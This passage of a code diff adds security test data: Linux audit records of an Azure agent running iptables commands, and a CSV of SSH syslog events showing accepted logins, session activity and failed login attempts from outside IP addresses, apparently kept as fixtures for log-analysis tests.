'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+98,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505717.592:9078020,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55765acfcbb8', 'a1=55765acfcb70', 'a2=55765acfcb88', 'a3=7fc279523810', 'items=2', 'ppid=28166', 'pid=28167', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+99,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505717.596:9078021,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c0fddb0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28168', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
diff --git a/tests/testdata/linux_logons.csv b/tests/testdata/linux_logons.csv
new file mode 100644
index 000000000..5a23c4d82
--- /dev/null
+++ b/tests/testdata/linux_logons.csv
@@ -0,0 +1,19971 @@
+,TenantId,SourceSystem,TimeGenerated,Computer,EventTime,Facility,HostName,SeverityLevel,SyslogMessage,ProcessID,HostIP,ProcessName,MG,Type,_ResourceId,LogonResult,User,SourceIP,SourcePort,UID,SourceUser
+0,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:04:29,UbuntuDevEnv,2019-06-26 19:04:29,auth,UbuntuDevEnv,info,Received signal 15  terminating.,1505,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:03:05,UbuntuDevEnv,2019-06-27 19:03:04,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.159.57 port 4020 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,3250,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.159.5,4020,,
+2,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:03:05,UbuntuDevEnv,2019-06-27 19:03:04,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),3250,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+3,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:03:05,UbuntuDevEnv,2019-06-27 19:03:05,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user peteb by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+4,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:03:05,UbuntuDevEnv,2019-06-27 19:03:05,auth,UbuntuDevEnv,info,New session 4 of user peteb.,1166,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+5,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:03:09,UbuntuDevEnv,2019-06-27 19:03:08,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.159.57 port 18279 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,4077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.159.5,18279,,
+6,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:03:09,UbuntuDevEnv,2019-06-27 19:03:08,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),4077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+7,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:03:09,UbuntuDevEnv,2019-06-27 19:03:09,auth,UbuntuDevEnv,info,New session 6 of user peteb.,1166,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+8,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:03:43,UbuntuDevEnv,2019-06-27 19:03:43,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,3250,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+9,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:58:31,UbuntuDevEnv,2019-06-27 19:58:31,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.159.185 port 11922 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,13841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.159.1,11922,,
+10,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:58:31,UbuntuDevEnv,2019-06-27 19:58:31,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),13841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+11,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:58:31,UbuntuDevEnv,2019-06-27 19:58:31,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user peteb by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+12,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:58:31,UbuntuDevEnv,2019-06-27 19:58:31,auth,UbuntuDevEnv,info,New session 71 of user peteb.,1292,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+13,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:58:34,UbuntuDevEnv,2019-06-27 19:58:33,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.159.185 port 51954 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,13854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.159.1,51954,,
+14,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:58:34,UbuntuDevEnv,2019-06-27 19:58:33,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),13854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+15,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 19:58:34,UbuntuDevEnv,2019-06-27 19:58:33,auth,UbuntuDevEnv,info,New session 73 of user peteb.,1292,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+16,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:41:11,UbuntuDevEnv,2019-06-27 20:41:10,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,13841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+17,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:41:11,UbuntuDevEnv,2019-06-27 20:41:10,auth,UbuntuDevEnv,info,Removed session 71.,1292,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+18,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:41:11,UbuntuDevEnv,2019-06-27 20:41:10,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,13854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:41:11,UbuntuDevEnv,2019-06-27 20:41:10,auth,UbuntuDevEnv,info,Removed session 73.,1292,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+20,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:42:52,UbuntuDevEnv,2019-06-27 20:42:51,auth,UbuntuDevEnv,info,Connection closed by authenticating user peteb 131.107.159.185 port 1374 [preauth],24952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,131.107.159.1,1374,,authenticating
+21,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:43:13,UbuntuDevEnv,2019-06-27 20:43:12,auth,UbuntuDevEnv,info,Connection closed by authenticating user peteb 131.107.159.185 port 57203 [preauth],25046,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,131.107.159.1,57203,,authenticating
+22,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:43:46,UbuntuDevEnv,2019-06-27 20:43:45,auth,UbuntuDevEnv,info,Connection closed by authenticating user peteb 131.107.159.185 port 48763 [preauth],25167,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,131.107.159.1,48763,,authenticating
+23,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:44:06,UbuntuDevEnv,2019-06-27 20:44:06,auth,UbuntuDevEnv,info,Connection closed by authenticating user peteb 131.107.159.185 port 44526 [preauth],25240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,131.107.159.1,44526,,authenticating
+24,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:44:47,UbuntuDevEnv,2019-06-27 20:44:47,auth,UbuntuDevEnv,info,Connection closed by authenticating user peteb 131.107.159.185 port 26234 [preauth],25387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,131.107.159.1,26234,,authenticating
+25,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:45:05,UbuntuDevEnv,2019-06-27 20:45:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.107.159.185  user=peteb,25428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,131.107.159.1,,0,
+26,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:45:07,UbuntuDevEnv,2019-06-27 20:45:06,auth,UbuntuDevEnv,info,Failed password for peteb from 131.107.159.185 port 2320 ssh2,25428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.107.159.1,2320,,
+27,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:45:12,UbuntuDevEnv,2019-06-27 20:45:12,auth,UbuntuDevEnv,info,Connection closed by authenticating user peteb 131.107.159.185 port 2320 [preauth],25428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,131.107.159.1,2320,,authenticating
+28,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:46:50,UbuntuDevEnv,2019-06-27 20:46:49,auth,UbuntuDevEnv,info,Connection closed by authenticating user peteb 131.107.159.185 port 45312 [preauth],25902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,131.107.159.1,45312,,authenticating
+29,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:46:59,UbuntuDevEnv,2019-06-27 20:46:59,auth,UbuntuDevEnv,info,Connection closed by authenticating user peteb 131.107.159.185 port 58307 [preauth],25941,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,131.107.159.1,58307,,authenticating
+30,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:48:00,UbuntuDevEnv,2019-06-27 20:48:00,auth,UbuntuDevEnv,info,Connection closed by authenticating user peteb 131.107.159.185 port 53903 [preauth],26155,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,131.107.159.1,53903,,authenticating
+31,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:50:04,UbuntuDevEnv,2019-06-27 20:50:03,auth,UbuntuDevEnv,info,Connection closed by authenticating user peteb 131.107.159.185 port 36900 [preauth],26594,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,131.107.159.1,36900,,authenticating
+32,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:56:02,UbuntuDevEnv,2019-06-27 20:56:01,auth,UbuntuDevEnv,info,Connection closed by authenticating user peteb 131.107.159.185 port 49594 [preauth],27840,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,131.107.159.1,49594,,authenticating
+33,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:56:18,UbuntuDevEnv,2019-06-27 20:56:17,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.159.185 port 28260 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,27885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.159.1,28260,,
+34,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:56:18,UbuntuDevEnv,2019-06-27 20:56:17,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),27885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+35,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:56:18,UbuntuDevEnv,2019-06-27 20:56:17,auth,UbuntuDevEnv,info,New session 154 of user peteb.,1292,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+36,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 20:56:18,UbuntuDevEnv,2019-06-27 20:56:17,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user peteb by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+37,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 21:50:41,UbuntuDevEnv,2019-06-27 21:50:41,auth,UbuntuDevEnv,info,Disconnected from 178.128.232.84 port 33400 [preauth],40903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.128.232.8,33400,,
+38,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 21:50:41,UbuntuDevEnv,2019-06-27 21:50:41,auth,UbuntuDevEnv,info,Received disconnect from 178.128.232.84 port 33400:11: Bye Bye [preauth],40903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.128.232.8,33400,,
+39,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:11:46,UbuntuDevEnv,2019-06-27 22:11:46,auth,UbuntuDevEnv,info,Invalid user admin from 193.32.163.182 port 42687,45806,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,42687,,
+40,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:11:46,UbuntuDevEnv,2019-06-27 22:11:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.32.163.182,45806,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.32.163.1,,0,
+41,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:11:46,UbuntuDevEnv,2019-06-27 22:11:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45806,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+42,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:11:48,UbuntuDevEnv,2019-06-27 22:11:48,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.32.163.182 port 42687 ssh2,45806,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,42687,,
+43,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:11:49,UbuntuDevEnv,2019-06-27 22:11:48,auth,UbuntuDevEnv,info,"Disconnecting invalid user admin 193.32.163.182 port 42687: Change of username or service not allowed: (admin,ssh-connection) -> (user,ssh-connection) [preauth]",45806,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,42687,,
+44,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:28:04,UbuntuDevEnv,2019-06-27 22:28:04,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,27885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+45,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:37:21,UbuntuDevEnv,2019-06-27 22:37:20,auth,UbuntuDevEnv,info,Connection closed by 45.67.14.164 port 54602 [preauth],4085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.67.14.1,54602,,
+46,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:38:16,UbuntuDevEnv,2019-06-27 22:38:16,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.159.185 port 11326 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,4275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.159.1,11326,,
+47,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:38:16,UbuntuDevEnv,2019-06-27 22:38:16,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),4275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+48,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:38:16,UbuntuDevEnv,2019-06-27 22:38:16,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user peteb by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+49,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:38:16,UbuntuDevEnv,2019-06-27 22:38:16,auth,UbuntuDevEnv,info,New session 15 of user peteb.,1071,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+50,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:58:26,UbuntuDevEnv,2019-06-27 22:58:25,auth,UbuntuDevEnv,info,Received disconnect from 131.107.159.185 port 11326:11: disconnected by user,4455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.107.159.1,11326,,user
+51,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:58:26,UbuntuDevEnv,2019-06-27 22:58:25,auth,UbuntuDevEnv,info,Removed session 15.,1071,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
